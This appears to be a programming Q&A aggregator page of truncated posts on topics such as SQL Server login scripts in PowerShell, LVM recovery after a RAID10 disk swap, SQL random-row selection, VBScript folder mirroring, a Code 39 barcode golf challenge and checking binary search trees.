    Version #1 of my script. And the results it returns when executed against my home laptop server. These results looked good, and for a long time I was concerned with other parts of the script, for all intents and purposes quite happy that this was an accurate assessment of the server. Let's just review my logic for each step of the code at the top:
    - Lines 1 to 7 just set up our variables and write out the header message
    - Line 8: our first loop, to go through each login on the server
    - Line 10: an inner loop that will assess each role name that each login has been assigned
    - Line 11: a test to see if each role has the name 'sysadmin'
    - Line 13: write out the login name with a bright format as it is a sysadmin login
    - Line 17: write out the login name with no formatting
    It is quite possible that here someone with more PowerShell experience than me will be shouting at their screen, pointing at the error I made, but to me this made total sense. Until I altered the code - I changed lines 6 and 7 of the code above to be:

        $c = $Svr.Logins.Count
        write-host "There are $c Logins on the server"

    This changed my output to look like this: This started alarm bells ringing - there are clearly not 13 logins listed. So, let's see where things are going wrong; edit the script so it looks like this (I've highlighted the changes to make). Running this code shows me these results. Our $n variable should count up by one for each login returned, and we are clearly missing some logins. I referenced this list back to Management Studio for my server and saw the logins as below, where there are clearly 13 logins. We see a login called Annette in SSMS but not in the script results, so I opened it up and looked at its properties, and at its server roles in particular. The account has only public access to the server. Inspection of the other logins that the PowerShell script misses shows they too are only members of the public role. Right now I can't work out whether there is a good reason for this and whether it should be expected behaviour or not. Please spend a few minutes to leave a comment if you have an opinion or theory.
    How to get the full list of logins. Clearly I needed to get a full list of the logins, so I set about reviewing my code to see if there was a better way to iterate through the roles for each login. This is the code that I came up with, and I think it is doing everything that I need it to. It gives me the expected results like this: so it seems that the ListMembers() method is the troublemaker in my first versions of the code. I would have expected ListMembers to return logins that are only members of the public role; certainly Technet makes no reference to them being left out in its Login.ListMembers details. Suffice to say, it's a lesson learned and I will approach using it with caution in future circumstances.
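    The working scripts were shown as screenshots in the original post, so here is a minimal, hypothetical reconstruction of the approach that avoids ListMembers(): ask each Login directly whether it belongs to the sysadmin role, which also covers logins that hold nothing beyond public. The server name and formatting are illustrative:

        # Minimal sketch - assumes the SMO assemblies are installed
        [void][Reflection.Assembly]::LoadWithPartialName('Microsoft.SqlServer.SMO')

        $Svr = New-Object Microsoft.SqlServer.Management.Smo.Server 'localhost'

        $c = $Svr.Logins.Count
        write-host "There are $c Logins on the server"

        foreach ($login in $Svr.Logins) {
            if ($login.IsMember('sysadmin')) {
                # bright format for the sysadmin logins
                write-host $login.Name -ForegroundColor Yellow
            }
            else {
                write-host $login.Name
            }
        }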

    Read the article

  • lvm disappeared after disc replacement on raid10

    - by user142295
    Here's my problem: I am running Ubuntu 12.04 on a raid10 (4 disks), on top of which I installed an LVM with two volume groups (one for /, one for /home). The layout of the disks is as follows:

        Disk /dev/sda: 1500.3 GB, 1500301910016 bytes
        255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors
        Units = sectors of 1 * 512 = 512 bytes
        Sector size (logical/physical): 512 bytes / 512 bytes
        I/O size (minimum/optimal): 512 bytes / 512 bytes
        Disk identifier: 0x0003f3b6

           Device Boot      Start         End      Blocks   Id  System
        /dev/sda1   *          63      481949      240943+  83  Linux
        /dev/sda2          481950  2910640634  1455079342+  fd  Linux raid autodetect
        /dev/sda3      2910640635  2930272064     9815715   82  Linux swap / Solaris

        Disk /dev/sdb: 1500.3 GB, 1500301910016 bytes
        255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors
        Units = sectors of 1 * 512 = 512 bytes
        Sector size (logical/physical): 512 bytes / 512 bytes
        I/O size (minimum/optimal): 512 bytes / 512 bytes
        Disk identifier: 0x00069785

           Device Boot      Start         End      Blocks   Id  System
        /dev/sdb1              63  2910158684  1455079311   fd  Linux raid autodetect
        /dev/sdb2      2910158685  2930272064    10056690   82  Linux swap / Solaris

        Disk /dev/sdc: 1500.3 GB, 1500301910016 bytes
        255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors
        Units = sectors of 1 * 512 = 512 bytes
        Sector size (logical/physical): 512 bytes / 512 bytes
        I/O size (minimum/optimal): 512 bytes / 512 bytes
        Disk identifier: 0x00000000

           Device Boot      Start         End      Blocks   Id  System
        /dev/sdc1              63  2910158684  1455079311   fd  Linux raid autodetect
        /dev/sdc2      2910158685  2930272064    10056690   82  Linux swap / Solaris

        Disk /dev/sdd: 1500.3 GB, 1500301910016 bytes
        255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors
        Units = sectors of 1 * 512 = 512 bytes
        Sector size (logical/physical): 512 bytes / 512 bytes
        I/O size (minimum/optimal): 512 bytes / 512 bytes
        Disk identifier: 0x000f14de

           Device Boot      Start         End      Blocks   Id  System
        /dev/sdd1              63  2910158684  1455079311   fd  Linux raid autodetect
        /dev/sdd2      2910158685  2930272064    10056690   82  Linux swap / Solaris

    The first disk (/dev/sda) contains the /boot partition on /dev/sda1. I use grub2 to boot the system off this partition. On top of this raid10 I installed two volume groups, one for /, one for /home. This system worked well; I even exchanged two disks during the last two years. It always worked. But not this time. For the first time, /dev/sda broke. I do not know if this is an issue - I know I would have struggled anyway to overcome the problem, with /boot installed on that disk and grub2 installed on the MBR of /dev/sda.
    Anyways, I did what I always did:
    1. Start Knoppix.
    2. Fire up the raid: sudo mdadm --examine --scan, which returns
           ARRAY /dev/md127 UUID=0dbf4558:1a943464:132783e8:19cdff95
    3. Start it up: sudo mdadm --assemble /dev/md127
    4. Fail the failing disk (smart event): sudo mdadm /dev/md127 --fail /dev/sda2
    5. Remove the failing disk: sudo mdadm /dev/md127 --remove /dev/sda2
    6. Stop the raid: sudo mdadm -S /dev/md127
    7. Take out the disk and replace it with a new one.
    8. Create the same partitions as on the failing one.
    9. Add it to the raid: sudo mdadm --assemble /dev/md127, then sudo mdadm /dev/md127 --add /dev/sda2
    10. Wait 4 hours.
    All looks fine: cat /proc/mdstat returns:

        Personalities : [raid10]
        md127 : active raid10 sda2[0] sdd1[3] sdc1[2] sdb1[1]
              2910158464 blocks 64K chunks 2 near-copies [4/4] [UUUU]

        unused devices: <none>

    and sudo mdadm --detail /dev/md127 returns:

        /dev/md127:
                Version : 0.90
          Creation Time : Wed Jun 10 13:08:46 2009
             Raid Level : raid10
             Array Size : 2910158464 (2775.34 GiB 2980.00 GB)
          Used Dev Size : 1455079232 (1387.67 GiB 1490.00 GB)
           Raid Devices : 4
          Total Devices : 4
        Preferred Minor : 127
            Persistence : Superblock is persistent

            Update Time : Thu Mar 21 16:27:40 2013
                  State : clean
         Active Devices : 4
        Working Devices : 4
         Failed Devices : 0
          Spare Devices : 0

                 Layout : near=2
             Chunk Size : 64K

                   UUID : 0dbf4558:1a943464:132783e8:19cdff95 (local to host Microknoppix)
                 Events : 0.4824680

            Number   Major   Minor   RaidDevice State
               0       8        2        0      active sync   /dev/sda2
               1       8       17        1      active sync   /dev/sdb1
               2       8       33        2      active sync   /dev/sdc1
               3       8       49        3      active sync   /dev/sdd1

    However, there is no trace of the volume groups. Rebooting into Knoppix does not help. Restarting the old system (I actually replugged and re-added the failing disk for that - the system begins to start, but then fails to see the / partition - no wonder if the volume group is gone) does not help. sudo vgscan, sudo vgdisplay, sudo lvs, sudo lvdisplay, and sudo vgscan --mknodes all returned "No volume groups found." I am completely at a loss. Can anyone tell me if and how I can recover my data? Thanks in advance!
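    For reference, these are the standard LVM tools one would typically reach for in this situation (generic commands, not from the original report; the volume group name is a placeholder):

        # Do any physical volumes still carry LVM labels?
        sudo pvscan
        sudo pvs -o pv_name,vg_name,pv_uuid

        # LVM keeps plain-text metadata backups; here they live on the old
        # root filesystem, so they may only be reachable from that system
        ls /etc/lvm/backup /etc/lvm/archive

        # If a metadata backup exists, the volume group layout can be
        # restored from it and the logical volumes reactivated
        sudo vgcfgrestore -f /etc/lvm/backup/myvg myvg
        sudo vgchange -ay myvg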

    Read the article

  • SQL to select random mix of rows fairly [migrated]

    - by Matt Sieker
    Here's my problem: I have a set of tables in a database populated with data from a client that contains product information. In addition to the basic product information, there is also information about the manufacturer, the categories those products belong to (a product can be in one or more categories), and which stores the products are available at. Those categories are referred to as "Product Categories". These tables are updated once a week from a feed from the customer. Since for our purposes some of the product categories are the same or closely related, there is another level of categories called "General Categories"; a general category can have one or more product categories. For the scope of these tables, here are some rough numbers:
    Data tables:
    - Products: 475,000
    - Manufacturers: 1,300
    - Stores: 150
    - General Categories: 245
    - Product Categories: 500
    Mapping tables:
    - Product Category -> Product: 655,000
    - Stores -> Products: 50,000,000
    Now, for the actual problem: as part of our software, we need to select n random products, given a store and a general category. However, we also need to ensure a good mix of manufacturers, as in some categories a single manufacturer dominates the results, and selecting rows at random causes the results to strongly favor that manufacturer. The solution currently in place works for most cases. It selects all of the rows that match the store and category criteria, partitions them on manufacturer, and includes their row number from within their partition; it then selects from that where the row number for that manufacturer is less than n, and uses ROWCOUNT to clamp the total rows returned to n. This query looks something like this:

        SET ROWCOUNT 6

        select p.Id, GeneralCategory_Id, Product_Id,
               ISNULL(m.DisplayName, m.Name) AS Vendor,
               MSRP, MemberPrice, FamilyImageName
        from (select p.Id, gc.Id GeneralCategory_Id, p.Id Product_Id,
                     ctp.Store_id, Manufacturer_id,
                     ROW_NUMBER() OVER (PARTITION BY Manufacturer_id
                                        ORDER BY NEWID()) AS 'VendorOrder',
                     MSRP, MemberPrice, FamilyImageName
              from GeneralCategory gc
              inner join GeneralCategoriesToProductCategories gctpc
                      ON gc.Id = gctpc.GeneralCategory_Id
              inner join ProductCategoryToProduct pctp
                      on gctpc.ProductCategory_Id = pctp.ProductCategory_Id
              inner join Product p on p.Id = pctp.Product_Id
              inner join StoreToProduct ctp on p.Id = ctp.Product_id
              where gc.Id = @GeneralCategory
                and ctp.Store_id = @StoreId
                and p.Active = 1
                and p.MemberPrice > 0) p
        inner join Manufacturer m on m.Id = p.Manufacturer_id
        where VendorOrder <= 6
        order by NEWID()

        SET ROWCOUNT 0

    (I've tried to format it somewhat to make it cleaner, but I don't think it really helps.) Running this query with an execution plan shows that for the majority of these tables it's doing a clustered index seek. There are two operations that take up roughly 90% of the time:
    - Index seek (nonclustered) on StoreToProduct: 17%. This table just contains the key of the store and the key of the product. It seems that NHibernate decided not to make a composite key when creating this table, but I'm not concerned about this at this point, compared to the other seek...
    - Clustered index seek on Product: 69%. I really have no clue how I could make this one more performant.
    On categories without a lot of products, performance is acceptable (<50 ms); however, larger categories can take a few hundred ms, with the largest category taking 3 s (it has about 170k products).
    It seems I have two ways to go from this point:
    1. Somehow optimize the existing query and table indices to lower the query time. As almost every expensive operation is already a clustered index seek, I don't know what could be done there. The inner query could be tuned to not return all of the possible rows for that category, but I am unsure how to do this and maintain the requirements (random products, with a good mix of manufacturers).
    2. Denormalize this data for the purpose of this query when doing the once-a-week import. However, I am unsure how to do this and maintain the requirements.
    Does anyone have any input on either of these items?
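    On the second item, one hedged sketch of the denormalization (table and column names are invented) is to materialize the inner query once a week at import time, so the runtime query only has to filter and shuffle one narrow, pre-joined table:

        -- Rebuilt during the weekly import (illustrative schema)
        CREATE TABLE dbo.StoreCategoryProduct
        (
            Store_id           int NOT NULL,
            GeneralCategory_Id int NOT NULL,
            Product_Id         int NOT NULL,
            Manufacturer_id    int NOT NULL,
            CONSTRAINT PK_StoreCategoryProduct
                PRIMARY KEY CLUSTERED (Store_id, GeneralCategory_Id, Product_Id)
        );

        -- Runtime query: same manufacturer-mix trick, far fewer joins
        SELECT TOP (6) t.Product_Id, t.Manufacturer_id
        FROM (SELECT scp.Product_Id, scp.Manufacturer_id,
                     ROW_NUMBER() OVER (PARTITION BY scp.Manufacturer_id
                                        ORDER BY NEWID()) AS VendorOrder
              FROM dbo.StoreCategoryProduct scp
              WHERE scp.Store_id = @StoreId
                AND scp.GeneralCategory_Id = @GeneralCategory) t
        WHERE t.VendorOrder <= 6
        ORDER BY NEWID();

    The NEWID() shuffle still has to touch every qualifying row, but against a single clustered range seek instead of the five-table join, which is where the sketch assumes the 3 s cases are spending their time.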

    Read the article

  • Update XML element with LINQ to XML in VB.NET

    - by Bayonian
    Hi, I'm trying to update an element in the XML document below. Here's the code:

        Dim xmldoc As XDocument = XDocument.Load(theXMLSource1)
        Dim ql As XElement = (From ls In xmldoc.Elements("LabService") _
                              Where CType(ls.Element("ServiceType"), String).Equals("Scan") _
                              Select ls.Element("Price")).FirstOrDefault
        ql.SetValue("23")
        xmldoc.Save(theXMLSource1)

    Here's the XML file:

        <?xml version="1.0" encoding="utf-8"?>
        <!--Test XML with LINQ to XML-->
        <LabSerivceInfo>
          <LabService>
            <ServiceType>Copy</ServiceType>
            <Price>1</Price>
          </LabService>
          <LabService>
            <ServiceType>PrintBlackAndWhite</ServiceType>
            <Price>2</Price>
          </LabService>
        </LabSerivceInfo>

    But I got this error message:

        Object reference not set to an instance of an object.
        Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.
        Error line: ql.SetValue("23")

    Can you show me what the problem is? Thank you.

    Read the article

  • Code Golf: Code 39 Bar Code

    - by gwell
    The challenge
    The shortest code by character count to draw an ASCII representation of a Code 39 bar code.
    Wikipedia article about Code 39: http://en.wikipedia.org/wiki/Code_39
    Input
    The input will be a string of legal characters for Code 39 bar codes. This means 43 characters are valid: 0-9, A-Z, (space) and -.$/+%. The * character will not appear in the input, as it is used as the start and stop character.
    Output
    Each character encoded in a Code 39 bar code has nine elements: five bars and four spaces. Bars will be represented with # characters, and spaces will be represented with the space character. Three of the nine elements will be wide. The narrow elements will be one character wide, and the wide elements will be three characters wide. An inter-character space of a single space should be added between each character pattern. The pattern should be repeated so that the height of the bar code is eight characters. The start/stop character * (bWbwBwBwb) would be represented like this:

        # # ### ### #
        # # ### ### #
        # # ### ### #
        # # ### ### #
        # # ### ### #
        # # ### ### #
        # # ### ### #
        # # ### ### #

        ^ ^ ^^ ^ ^ ^ ^^^
        | | || | | | |||
        narrow bar -+ | || | | | |||
        wide space ---+ || | | | |||
        narrow bar -----+| | | | |||
        narrow space ------+ | | | |||
        wide bar --------+ | | |||
        narrow space ----------+ | |||
        wide bar ------------+ |||
        narrow space --------------+||
        narrow bar ---------------+|
        inter-character space ----------------+

    The start and stop character * will need to be output at the start and end of the bar code. No quiet space needs to be included before or after the bar code. No check digit needs to be calculated. Full ASCII Code 39 encoding is not required, just the standard 43 characters. No text needs to be printed below the ASCII bar code representation to identify the output contents. The character # can be replaced with another character of higher density if wanted. Using the full block character U+2588 would allow the bar code to actually scan when printed.
    Test cases
    Input: ABC
    Output:

        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### #

    Input: 1/3
    Output:

        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #
        # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### #

    Input: - $ (minus space dollar)
    Output:

        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #
        # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### #

    Code count includes input/output (full program).

    Read the article

  • Jboss Error-Cannot process metadata

    - by Nila
    Hi! I'm trying to implement a stateless session bean (EJB3) in JBoss 5, using NetBeans 6.8 as an editor. When I tried deploying my application, I got the following error. What is the issue with this?

        17:45:04,901 ERROR [AbstractKernelController] Error installing to PostClassLoader: name=vfszip:/E:/Shalini/jboss-5.1.0.GA/server/default/deploy/InsighIT1.1-ejb.jar/ state=ClassLoader mode=Manual requiredState=PostClassLoader
        org.jboss.deployers.spi.DeploymentException: Cannot process metadata
            at org.jboss.deployers.spi.DeploymentException.rethrowAsDeploymentException(DeploymentException.java:49)
            at org.jboss.deployment.AnnotationMetaDataDeployer.deploy(AnnotationMetaDataDeployer.java:181)
            at org.jboss.deployment.AnnotationMetaDataDeployer.deploy(AnnotationMetaDataDeployer.java:93)
            at org.jboss.deployers.plugins.deployers.DeployerWrapper.deploy(DeployerWrapper.java:171)
            at org.jboss.deployers.plugins.deployers.DeployersImpl.doDeploy(DeployersImpl.java:1439)
            at org.jboss.deployers.plugins.deployers.DeployersImpl.doInstallParentFirst(DeployersImpl.java:1157)
            at org.jboss.deployers.plugins.deployers.DeployersImpl.doInstallParentFirst(DeployersImpl.java:1210)
            at org.jboss.deployers.plugins.deployers.DeployersImpl.install(DeployersImpl.java:1098)
            at org.jboss.dependency.plugins.AbstractControllerContext.install(AbstractControllerContext.java:348)
            at org.jboss.dependency.plugins.AbstractController.install(AbstractController.java:1631)
            at org.jboss.dependency.plugins.AbstractController.incrementState(AbstractController.java:934)
            at org.jboss.dependency.plugins.AbstractController.resolveContexts(AbstractController.java:1082)
            at org.jboss.dependency.plugins.AbstractController.resolveContexts(AbstractController.java:984)
            at org.jboss.dependency.plugins.AbstractController.change(AbstractController.java:822)
            at org.jboss.dependency.plugins.AbstractController.change(AbstractController.java:553)
            at org.jboss.deployers.plugins.deployers.DeployersImpl.process(DeployersImpl.java:781)
            at org.jboss.deployers.plugins.main.MainDeployerImpl.process(MainDeployerImpl.java:702)
            at org.jboss.system.server.profileservice.repository.MainDeployerAdapter.process(MainDeployerAdapter.java:117)
            at org.jboss.system.server.profileservice.hotdeploy.HDScanner.scan(HDScanner.java:362)
            at org.jboss.system.server.profileservice.hotdeploy.HDScanner.run(HDScanner.java:255)
            at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:441)
            at java.util.concurrent.FutureTask$Sync.innerRunAndReset(FutureTask.java:317)
            at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:150)
            at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$101(ScheduledThreadPoolExecutor.java:98)
            at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.runPeriodic(ScheduledThreadPoolExecutor.java:181)
            at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:205)
            at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:885)
            at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:907)
            at java.lang.Thread.run(Thread.java:619)
        Caused by: java.lang.ClassNotFoundException: tomcat.Main from BaseClassLoader@1d6d136{VFSClassLoaderPolicy@41312b{name=vfszip:/E:/hh/jboss-5.1.0.GA/server/default/deploy/InsighIT1.1-ejb.jar/

    Read the article

  • VBScript - Checking each subfolder for files and copying them

    - by Kenny Bones
    I'm trying to get this script to work. It's basically supposed to mirror two sets of folders and make sure they are exactly the same. If a folder is missing, the folder and its contents should be copied. The script should then compare the DateModified attribute and only copy a file if the source file is newer than the destination file. So far I've been able to check whether each subfolder exists and create it if it doesn't, and to scan the top source folder for its files and copy them if they don't exist or if the source's DateModified is newer. What remains is scanning each subfolder for its files and copying them under the same conditions (see the Java sketch after the code). Here's the code:

    Dim strSourceFolder, strDestFolder
    strSourceFolder = "c:\users\vegsan\desktop\Source\"
    strDestFolder = "c:\users\vegsan\desktop\Dest\"

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objTopFolder = fso.GetFolder(strSourceFolder)
    Set colTopFiles = objTopFolder.Files

    ' Check to see if subfolders actually exist; create them if they don't
    Set objColFolders = objTopFolder.SubFolders
    For Each subFolder in objColFolders
        CheckFolder subFolder, strSourceFolder, strDestFolder
    Next

    ' Check all files in the first top folder
    For Each objFile in colTopFiles
        CheckFiles objFile, strSourceFolder, strDestFolder
    Next

    Sub CheckFolder (strSubFolder, strSourceFolder, strDestFolder)
        Set fso = CreateObject("Scripting.FileSystemObject")
        Dim folderName, aSplit
        aSplit = Split (strSubFolder, "\")
        If UBound (aSplit) > 1 Then
            folderName = aSplit(UBound(aSplit))
            folderName = strDestFolder & folderName
        End If
        If Not fso.FolderExists(folderName) Then
            fso.CreateFolder(folderName)
        End If
    End Sub

    Sub CheckFiles (file, SourceFolder, DestFolder)
        Set fso = CreateObject("Scripting.FileSystemObject")
        Dim DateModified
        DateModified = file.DateLastModified
        ' Fixed: the original passed the misspelled (and therefore Empty) DateMofidied
        ReplaceIfNewer file, DateModified, SourceFolder, DestFolder
    End Sub

    Sub ReplaceIfNewer (sourceFile, DateModified, SourceFolder, DestFolder)
        Const OVERWRITE_EXISTING = True
        Dim fso, sourceFileName, destFileName
        Dim DestDateModified, objDestFile
        Set fso = CreateObject("Scripting.FileSystemObject")
        sourceFileName = fso.GetFileName(sourceFile)
        destFileName = DestFolder & sourceFileName
        If Not fso.FileExists(destFileName) Then
            fso.CopyFile sourceFile, destFileName
        Else
            Set objDestFile = fso.GetFile(destFileName)
            DestDateModified = objDestFile.DateLastModified
            ' Fixed: compare with > so only a newer source overwrites the destination
            If DateModified > DestDateModified Then
                fso.CopyFile sourceFile, destFileName, OVERWRITE_EXISTING
            End If
        End If
    End Sub
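    For comparison, the same mirror logic (create missing folders, copy a file only when it is absent or the source is newer) can be sketched recursively in Java NIO. This is only an illustration of the recursion the script above still needs for its subfolders, not a drop-in replacement, and the names are illustrative:

        import java.io.IOException;
        import java.nio.file.*;

        public class Mirror {
            // Recursively mirror src into dst: create missing folders, copy a
            // file only when it is absent or the source copy is newer.
            static void mirror(Path src, Path dst) throws IOException {
                Files.createDirectories(dst);
                try (DirectoryStream<Path> entries = Files.newDirectoryStream(src)) {
                    for (Path entry : entries) {
                        Path target = dst.resolve(entry.getFileName());
                        if (Files.isDirectory(entry)) {
                            mirror(entry, target); // recurse into each subfolder
                        } else if (!Files.exists(target)
                                || Files.getLastModifiedTime(entry)
                                        .compareTo(Files.getLastModifiedTime(target)) > 0) {
                            // COPY_ATTRIBUTES keeps the modified date, so later runs compare correctly
                            Files.copy(entry, target, StandardCopyOption.REPLACE_EXISTING,
                                    StandardCopyOption.COPY_ATTRIBUTES);
                        }
                    }
                }
            }
        }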

    Read the article

  • Find the "largest" dense sub matrix in a large sparse matrix

    - by BCS
    Given a large sparse matrix (say 10k+ by 1M+) I need to find a subset, not necessarily contiguous, of the rows and columns that form a dense matrix (all non-zero elements). I want this submatrix to be as large as possible (not the largest sum, but the largest number of elements) within some aspect ratio constraints. Are there any known exact or approximate solutions to this problem? A quick scan on Google seems to give a lot of close-but-not-exactly results. What terms should I be looking for?

    Edit: Just to clarify: the submatrix need not be contiguous. In fact the row and column order is completely arbitrary, so adjacency is completely irrelevant.

    A thought based on Chad Okere's idea (sketched in code below):
    1. Order the rows from largest count to smallest count (not necessary but might help perf).
    2. Select two rows that have a "large" overlap.
    3. Add all other rows that won't reduce the overlap.
    4. Record that set.
    5. Add whatever row reduces the overlap by the least.
    6. Repeat at #3 until the result gets too small.
    7. Start over at #2 with a different starting pair.
    8. Continue until you decide the result is good enough.
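    A rough sketch in Java of steps 2 to 4 of that heuristic, assuming each row is represented as a BitSet of its non-zero columns; the rows-times-shared-columns score and all names are illustrative assumptions, and the O(n^2) pair loop would need the step-1 ordering plus pruning to be practical at 10k+ rows:

        import java.util.*;

        public class DenseBlock {
            // Greedy sketch: grow a set of rows whose ANDed column set stays
            // non-empty, maximizing rows * sharedColumns (steps 2 to 4 only;
            // the step-5 relaxation loop is left out for brevity).
            static int[] bestRows(BitSet[] rows) { // rows[i] = non-zero columns of row i
                List<Integer> best = new ArrayList<>();
                long bestScore = 0;
                for (int a = 0; a < rows.length; a++) {
                    for (int b = a + 1; b < rows.length; b++) {
                        BitSet overlap = (BitSet) rows[a].clone();
                        overlap.and(rows[b]); // step 2: a "large" starting overlap
                        if (overlap.isEmpty()) continue;
                        List<Integer> picked = new ArrayList<>(Arrays.asList(a, b));
                        for (int r = 0; r < rows.length; r++) { // step 3: rows that cost nothing
                            if (r == a || r == b) continue;
                            BitSet t = (BitSet) overlap.clone();
                            t.and(rows[r]);
                            if (t.cardinality() == overlap.cardinality()) picked.add(r);
                        }
                        long score = (long) picked.size() * overlap.cardinality();
                        if (score > bestScore) { // step 4: record the best set seen
                            bestScore = score;
                            best = picked;
                        }
                    }
                }
                return best.stream().mapToInt(Integer::intValue).toArray();
            }
        }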

    Read the article

  • Recover files from corrupt filesystem

    - by Emile 81
    My situation: I have an older 80GB IDE internal hdd with a few files on it that I would very much like to recover: some Word documents, some LaTeX documents (text files) and pictures (png, jpg, eps files), and some other text documents and Visual Studio project files. I had backed them up (not the LaTeX ones, though) using svn, but have not committed lately, and would lose a lot of work if I can't recover them. The hdd seems to have lost its filesystem; I have no idea how it came about. I know it has/had 3 NTFS partitions, and I know the files I want are on the second or third partition. I read http://superuser.com/questions/81877/recover-hard-disk-data. Partition Find and Mount did not see all the partitions using intelligent scan. TestDisk does (I think); I followed the step-by-step instructions here, but when I try to list the files it says: "Can't open filesystem, filesystem seems damaged." I'm not sure how to proceed, as TestDisk's wiki does not contain this error message afaik. I don't know if the hdd is going to fail or if some program has caused the filesystem to become corrupt; the hdd doesn't make a sound, so I guess that's good. I would like some guidance so I don't accidentally cause more damage. (E.g. is it ok to let TestDisk write the filesystem to disk? I'm pretty sure the partitions are listed ok, but not 100%.)

    Read the article

  • Finding if a Binary Tree is a Binary Search Tree

    - by dharam
    Today I had an interview where I was asked to write a program which takes a Binary Tree and returns true if it is also a Binary Search Tree, otherwise false. My Approach 1: Perform an inorder traversal and store the elements in O(n) time. Now scan through the array/list of elements and check whether the element at the ith index is greater than the element at the (i+1)th index. If such a condition is encountered, return false and break out of the loop. (This takes O(n) time.) At the end return true. But this gentleman wanted me to provide an efficient solution. I tried but was unsuccessful, because to find whether it is a BST I have to check each node. Moreover he was pointing me to think over recursion. My Approach 2: A BT is a BST if for any node N, N->left < N and N->right > N, the inorder successor of the left node of N is less than N, the inorder successor of the right node of N is greater than N, and the left and right subtrees are BSTs. But this is going to be complicated and the running time doesn't seem good. Please help if you know any optimal solution. Thanks.
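    For reference, the usual O(n) recursive answer to this interview question passes narrowing min/max bounds down the tree. A minimal sketch in Java, with an assumed int-keyed Node class and distinct keys:

        class Node {
            int key;
            Node left, right;
        }

        class BstCheck {
            // A node is valid if its key fits the (lo, hi) range inherited from
            // its ancestors; each recursive call narrows one bound.
            static boolean isBST(Node n, long lo, long hi) {
                if (n == null) return true;                   // an empty subtree is a BST
                if (n.key <= lo || n.key >= hi) return false; // violates an ancestor's bound
                return isBST(n.left, lo, n.key)               // left keys stay below n.key
                    && isBST(n.right, n.key, hi);             // right keys stay above it
            }
            // Usage: isBST(root, Long.MIN_VALUE, Long.MAX_VALUE)
        }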

    Read the article

  • Image Line Trace Math Help Hard To Explain

    - by Ozzy
    Hi all, sorry for the confusing title; it's really hard for me to explain what I want. So I created this image :) Ok, so the two RED dots are points on an image. The distance between them isn't important. What I want to do is, using the coordinates of the two dots, work out the angle of the space between them (as shown by the black line between the red dots). Then, once the angle is found, on the last red dot, create two points which cross the angle of the first line. Then from that, scan a half semicircle and get the coordinates of every pixel of the image that the orange line passes. I don't know if this makes any sense to you lot, so I drew another picture: As you can see in the second picture, my idea is applied to a line drawn on a black canvas. The two red dots are the starting coordinates, then at the end of the two dots a less-than-half semicircle is created. The part that is orange shows the pixels of the image that should be recorded. I have no clue how to start this, so if anyone has any ideas on how I can, or on what I need to do, any help is much appreciated :)
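    If the drawings are read as described, the two steps are atan2 for the angle of the black line, then sampling points on an arc centred on the second dot. A minimal sketch in Java; the radius value and the exact half-circle sweep are assumptions based on the description:

        import java.util.ArrayList;
        import java.util.List;

        public class ArcTrace {
            // Pixels along a half-circle arc centred on (x2, y2), straddling
            // the direction of the segment (x1, y1) -> (x2, y2).
            static List<int[]> arcPixels(int x1, int y1, int x2, int y2, double radius) {
                double heading = Math.atan2(y2 - y1, x2 - x1); // angle of the black line
                List<int[]> pixels = new ArrayList<>();
                double step = 1.0 / radius; // roughly one-pixel spacing along the arc
                for (double a = heading - Math.PI / 2; a <= heading + Math.PI / 2; a += step) {
                    int px = (int) Math.round(x2 + radius * Math.cos(a));
                    int py = (int) Math.round(y2 + radius * Math.sin(a));
                    pixels.add(new int[] { px, py }); // sample the image at this coordinate
                }
                return pixels;
            }
        }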

    Read the article

  • MEF = may experience frustration?

    - by Dave
    Well, it's not THAT bad yet. :) But I do have questions after Reed pointed me at MEF as a potential alternative to IoC (and so far it does look pretty good). Consider the following model: As you can see, I have an App, and this app uses Plugins (whoops, missed that association!). Both the App and the Plugins require an object of type CandySettings, which is found in yet another assembly. I first tried to use the ComposeParts method in MEF, but the only way I could get this to work was to do something like this in the plugin code:

    var container = new CompositionContainer();
    container.ComposeParts(this, new CandySettings());

